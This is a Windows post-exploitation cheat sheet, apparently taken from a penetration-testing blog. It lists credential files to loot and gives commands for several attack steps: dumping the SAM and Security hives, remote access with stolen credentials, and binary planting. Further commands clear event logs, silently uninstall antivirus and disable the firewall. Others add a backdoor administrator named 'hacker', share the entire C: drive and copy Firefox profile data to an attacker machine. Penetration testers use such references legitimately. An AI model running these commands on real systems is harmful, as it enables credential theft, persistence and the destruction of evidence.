Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software

%WINDIR%\repair\security

%WINDIR%\iis6.log (5, 6 or 7)

%WINDIR%\system32\logfiles\httperr\httperr1.log
IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
IIS 7’s logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log

%USERPROFILE%\ntuser.dat

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

%WINDIR%\System32\drivers\etc\hosts

unattend.txt, unattend.xml, sysprep.inf
Used in the automated deployment of windows images and can contain user accounts. No known default location.



Remote System Access   

Command
Description / Reason
net share \\computername

tasklist /V /S computername

qwinsta /SERVER:computername

qprocess /SERVER:computername *

net use \\computername
This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username password
Mapping IPC$ with an explicit user name and password lets commands that never ask for credentials run as that user in the context of the remote system.

This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
Enable remote assistance


  • net time \\computername (Shows the time of target computer)
  • dir \\computername\share_or_admin_share\   (dir list a remote directory)
  • tasklist /V /S computername
    • Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount


Auto-Start Directories


  • ver (Returns kernel version - like uname on *nix)
Windows NT 6.1, 6.0
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5.0
%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\


Binary Planting

Location / File name
Reason / Description
msiexec.exe
Idea taken from here: http://goo.gl/E3LTa - put an evil binary named msiexec.exe in the Downloads directory; when an installer calls msiexec without specifying the path, you get code execution.
%SystemRoot%\System32\wbem\mof\
Taken from stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vuln
Check the %PATH% environment variable: some of its directories may be writable. See: https://www.htbridge.com/advisory/HTB23108


WMI


  • wmic bios

  • wmic qfe get hotfixid (lists the IDs of installed patches)
  • wmic startup
  • wmic service
  • wmic process get caption,executablepath,commandline
  • wmic process call create “process_name” (executes a program)
  • wmic process where name=”process_name” call terminate (terminates program)
  • wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
  • wmic useraccount (usernames, sid, and various security related goodies)
  • wmic useraccount get /ALL
  • wmic share get /ALL (you can use ? for gets help ! )
  • wmic startup list full (this can be a huge list!!!)
  • wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

Reg Commands


  • reg save HKLM\Security security.hive  (Save security hive to a file)
  • reg save HKLM\System system.hive (Save system hive to a file)
  • reg save HKLM\SAM sam.hive (Save SAM to a file)

  • reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
  • reg export [RegDomain]\[Key] [FileName]
  • reg import [FileName ]
  • reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

Deleting Logs


  • wevtutil el  (list logs)
  • wevtutil cl <LogName> (Clear a specific log)
  • del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)


  • wmic product get name /value (this gets software names)
  • wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)

Other (to be sorted)


  • pkgmgr /iu:"Package" (install an optional Windows component)
  • pkgmgr /iu:"TelnetServer" (install the Telnet service)
  • pkgmgr /iu:"TelnetClient" (install the Telnet client)
  • rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
  • wscript.exe <script js/vbs>
  • cscript.exe <script js/vbs/c#>
  • xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff
OS specific

Win2k3

  • winpop stat domainname

Vista/7


  • winstat features
  • wbadmin get status
  • wbadmin get items
  • gpresult /H gpols.htm
  • bcdedit /export <filename>

Vista SP1/7/2008/2008R2 (x86 & x64)


Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary

To list features which can be enabled/disabled:

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

To enable a feature (TFTP client for example):

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

To disable a feature (again TFTP client):

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP

Invasive or Altering Commands

These commands change things on the target and can lead to getting detected
Command
Description
net user hacker hacker /add
Creates a new local (to the victim) user called 'hacker' with the password 'hacker'
net localgroup administrators /add hacker
or
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer Windows versions (will have to look up exactly when, I believe since XP SP2) share permissions and file permissions are separate. Since we added ourselves as a local admin this isn't a problem, but it is something to keep in mind.
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall
netsh firewall set opmode enable
Enables the local Windows firewall. If rules are not in place for your connection, this could cause you to lose it.

Source: http://stormsecurity.wordpress.com/2012/06/05/manual-pentesting-cheatsheet-windows/
              https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit#



